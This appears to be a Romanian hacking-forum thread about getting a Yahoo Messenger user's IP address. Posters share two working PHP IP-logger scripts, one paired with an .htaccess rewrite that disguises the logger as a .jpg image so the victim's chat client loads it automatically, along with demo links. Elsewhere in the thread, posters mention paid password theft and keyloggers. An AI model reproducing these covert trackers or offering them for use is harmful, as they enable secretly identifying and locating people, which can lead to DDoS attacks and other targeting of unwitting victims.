Jump to content
xTremeSurfer

Ip yahoo!

Recommended Posts

zice bine H4ck3rPr4fz0rrr. , eu am folosit tot netstat , decat sa cauti zeci de programele care poate nici nu merg, e mai sigur sa privesti o fereastra cmd , vezi ip-ul respectiv si te duci pe whatismyip.com si cauti ip-ul respectiv, cel putin eu asa faceam inainte ( cand eram user windows)

Link to comment
Share on other sites

zice bine H4ck3rPr4fz0rrr. , eu am folosit tot netstat , decat sa cauti zeci de programele care poate nici nu merg, e mai sigur sa privesti o fereastra cmd , vezi ip-ul respectiv si te duci pe whatismyip.com si cauti ip-ul respectiv, cel putin eu asa faceam inainte ( cand eram user windows)

si daca mai ai msn/skype/pidgin/firefox/ si nush cate deschide....iti apare in netstat(si + iti apare ip celor de la yahoo...numai cand trasferi un file...vezi ip...) ditamai carnatu....e cel mai simplu cu cpanel sau cu scriptu ala care a fost postat mai sus...i pui imaginea in conversatie si...clientul de yahoo o incarca automat...

Link to comment
Share on other sites

  • Moderators
si daca mai ai msn/skype/pidgin/firefox/ si nush cate deschide....iti apare in netstat(si + iti apare ip celor de la yahoo...numai cand trasferi un file...vezi ip...) ditamai carnatu....e cel mai simplu cu cpanel sau cu scriptu ala care a fost postat mai sus...i pui imaginea in conversatie si...clientul de yahoo o incarca automat...

Yahoo Messenger! 10 si 11 fac legatura prin serverul de Yahoo! din cate stiu, nu direct ca sa mai poti vedea IP-ul.

Link to comment
Share on other sites

Sau o alta metoda cu un scrip php(urcat bineinteles pe un host).Dati link-ul unde ati urcat scriptul victimei, sau puneti-l la status ... iar pe host veti avea un fisier "ipuri.txt" in care se memoreaza ip-urile.

<?php

$ip = $_SERVER['REMOTE_ADDR'];

$date = date("d/m/y");

$time = date("H:i:s");

$f = fopen("ipuri.txt", a);

fwrite($f, "IP: $ip\nDate: $date\nTime: $time\n");

fwrite($f, "--------------------\n");

fclose($f);

?>

Dezavantaje:

- trebuie neaparat sa dea click pe link, altfel adio ip

- nu puteti sti al cui este ip-ul, toate se salveaza unul dupa altul

Link to comment
Share on other sites

Deci ascultati aici la mine...terminati cu prostiile voastre de programe...acum pe google sunt fff multe ddosere...si yahoo a vazut asta...de asta a facut u patch...incat tu numai poti vedea ipul victimei...ca asa tot nubu lar tintui...acum vezi ipu serverului yahoo....server care poate fi doborat...dar nu asa...de toti copiii...

deci...in concluzie..ipul care voi e posibil sal obtineti..este un ip de server yahoo...

Altceva...sa numai aud ca ...""ba esti prost..?yahoo nu poate fi spart"..sau prostii din astea...voi cand vreti sa spargeti yahoo...si in general...multi copii vor asta...sincer nu stiu ce anume vreti sa faceti...si aici sunt 2 variante:

1.vreau sa sparg yahoo!(...apoi vreau sa le instalez monopoly pe servere sa ma joc cu ei)..asta sincer nu stiu daca se poate..

2.vreau sa sparg yahoo!(vreau sa sustrag parola unui user de pe un server yahoo fara sa sterg informatii sau sa aduc prejudicii firmei yahoo )...asta va spun din sursa 101% sigura ca se poate..sunt persoane numite exploiteri..care iti pot face rost de parola dorita si apoi sa blocheze accesul la resetare. normal contra unei sume destul de consistente.

Yahoo numai este ce a fost odata,ziceti voi de romani ca sunt jegosi ca nepotism...dar si acolo e la fel...termini o facultate si unchiu tau lucreaza acolo...pac..imediat te baga si pe tine..chiar daca tu habar nu ai si e vai de steaua ta..(aici nu ma refer la romani ma refer la straini)..si uite asa apar gaurile in securitatea lor...servere neingrijite..etc.

Pe acest site..RST...sunt moderatori foarte destepti...este NYTRO care omu exceleaza in programare si este foarte bun in acest domeniu..si sunt sigur ca si multe altele....

Pai daca Nyto ca toti il stiti...se pune la un calculator...cu inca un coleg de aici care exceleaza in retelistica si cu altul care exceleaza in linux......pai trebuie sa fii complet retardat macar sa crezi..ca ei 3 nu se pot descurca sa gaseasca o mica bresa in securitatea unui server yahoo..

Dar toti intrati si ziceti..vreau sa sparg aia..vreau sa sparg aia...oamenii au un nivel ridicat de etica si morala..normal ca nu va ajuta..ca dupaia daca se afla acest site va fi inchis..vine sri-u..anchete si etc..si oare se merita...??nu cred..nu risca ei bunastarea a sute de useri..pentru unu care vrea el sa hackuiasca..

TOcmai ce am vazut o emisiune de discovery channel....un parau foarte iute..a incercat un om sal treaca...la luat curentu..a incercat al doilea..la luat curentu...in final..s-au tinut toti 7 care au mai ramas de mana..au intrat in parau..si se trageau unii pe altii..astfel..primul ajuns pe partea cealalta...ia tras pe restu 6..o simpla mana..ca are 5 degete..nu e mare lucru..unita cu alta..si cu alta..si cu alta...a reusit sa faca...ce poate sute de oameni ..nu au putut face asa de capul lor...si anume..sa treaca de un obstacol.In final...situ-l.....orasul...tara....mother earth....va rezista in timp sa existe doar cu unitate...doar daca stam uniti...caci daca nu stam..va fi vai de noi..ma bucur ca eu voi muri si nu voi apuca acele clipe.

FINAL:nu toata lumea va intelege ce am scris eu aici...imi cer scuze este mult de citit...vor fi pareri si pareri..eu va respect pe toti..si va respect parerile...imi cer scuze fata de persoanele carora le-am folosit numele in acest post...fara a cere voie in avans...imi cer scuze..si va respect pe toti..respect RST.

Link to comment
Share on other sites

Hai frate, ce va chinuiti atat cu cPanel.. luati-va un server apache cu PHP si htaccess cu rewrite si bagati in acelasi director..

- un fisier doc.php cu continutul urmator


<?php
$fp = fopen('ips.txt','a');
fwrite($fp,$_SERVER['REMOTE_ADDR'] . " pe " . date('d.m.Y') . " la ora " . date('H:i:s') . "\n");
fclose($fp);
header('Content-type: image/jpeg');
echo file_get_contents("php.jpeg");
?>

- un fisier ips.txt cu chmod 777

- o imagine denumita php.jpeg

- un fisier .htaccess cu continutul urmator


Options +FollowSymlinks
RewriteEngine on
RewriteRule imagine.jpg doc.php

Linkul pe care i-l dati victimei este http://site.ro/directorul_unde_ati_incarcat_fisierele/imagine.jpg

Demo: http://default.uni.me/rst/imagine.jpg

Demo ips: http://default.uni.me/rst/ips.txt

Asta merge 101%, asa folosesc si eu, trimiti linkul i deschide automat clientu yahoo si jap ip luat.

Nu cu program bagi id si bingo iti da ip-u cum cred unii !

Edit:// dany love, am inteles ca sunt acu niste haceri incredibili, cand aprinzi pc-u ti se umple de virusi, scoate repede sarma de la net din spate cica peste vreo 2 ani se remediaza situatia sa nu cumva sa o mai bagi la loc!!!

Edited by H4ck3rPr4fz0rrr.
Link to comment
Share on other sites

wow..Z.D.O...o sa vorbesc cu un moderator de aici sa iti dea un premiu..sau sa te faca VIP..tu tocmai ai descoperit o metoda hack personala prin care sa faci multe posturi...si anume (POSTAM asa sa vedem daca mai merge tastatura)...

postul tau de mai sus era necesar oare?

daca colegu Synthesis spune ca metoda lui merge..credel pe cuvant sau taci...nui nevoie sa vii cu comentarii inutile.

salut

Link to comment
Share on other sites

Chiar a?a, ZDO, cine te crezi tu s? le zici c? vorbesc aiurea? .... Glumesc, normal. :|

@dany_love: e?ti incoerent. Restructureaz?-?i gândirea ?i fii mai atent. dac? ceri expres î?i analizez comentariul în detaliu. hai c?-mi pot r?pi vreo 10-15 minute din timp.

ontopic: trimi?i imagine pe yahoo ?i se deschide automat, asta dac? folose?te Yahoo! Messenger. Dac? nu, convinge-l s-o deschid?.

https://rstcenter.com/forum/15140-aduna-informatii-pe-baza-unei-imagini.rst

Link to comment
Share on other sites

Tromfil man...te rog intelege ca nimeni in ziua de azi numai da clik pe linkuri.. numai accepta poze....sau dat toti pe facebook in mama lor..daca tu ai facut imaginea sa se deschida automat...bravo..si apoi ce?ii dai flood...victima se prinde..iti fute ignore...da restart..primeste un nou ip dinamic care nu il vei sti..si gata povestea..

adevarul este...ca peste 98% din voi...inclusiv moderatori si etc...va atacati urat de tot...cand alte persoane stiu in unele domenii mai multe decat voi..eu nu imi prind mintea cu tine..nu stiu cati ani ai si nu e treaba mea....iti sugerez sa iti restructurezi gandirea si sa fii mai atent..pentru ca doamne fereste te poti trezi peste noapte fara cont de mes.....cu toate ca din cate au spus moderatorii aici nu se poate...si asta..fara ipuri...fara accept de fisiere..sau alte prostii...deschideti odata mintea...si intelege pentru numele lui dumnezeu ca ""o gaina poate fi jupuita in mai multe feluri""

PS:daca ai talent incearca sa faci un .exe sa se deschida automat...pe ym....sunt sigur ca ai face multa lume fericita...wow...ce or sa se cumpere atunci keylogerele..

o zi faina.

imi cer scuze ZDO....am crezut ca ai spus de mine..te rog accepta-mi scuzele.

Edited by Zatarra
Link to comment
Share on other sites

Guest Kovalski
=)) fratilor administrador de tareas iti arata ip, nu trebuie sa va luati dupa programe, gen exe, si asa mai departe, fiti voi insusi si simpli, usor e de aflat, problema e ce vrei sa faci cu el ?

si.. ar trebui sa ne luam dupa programe .gif ?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...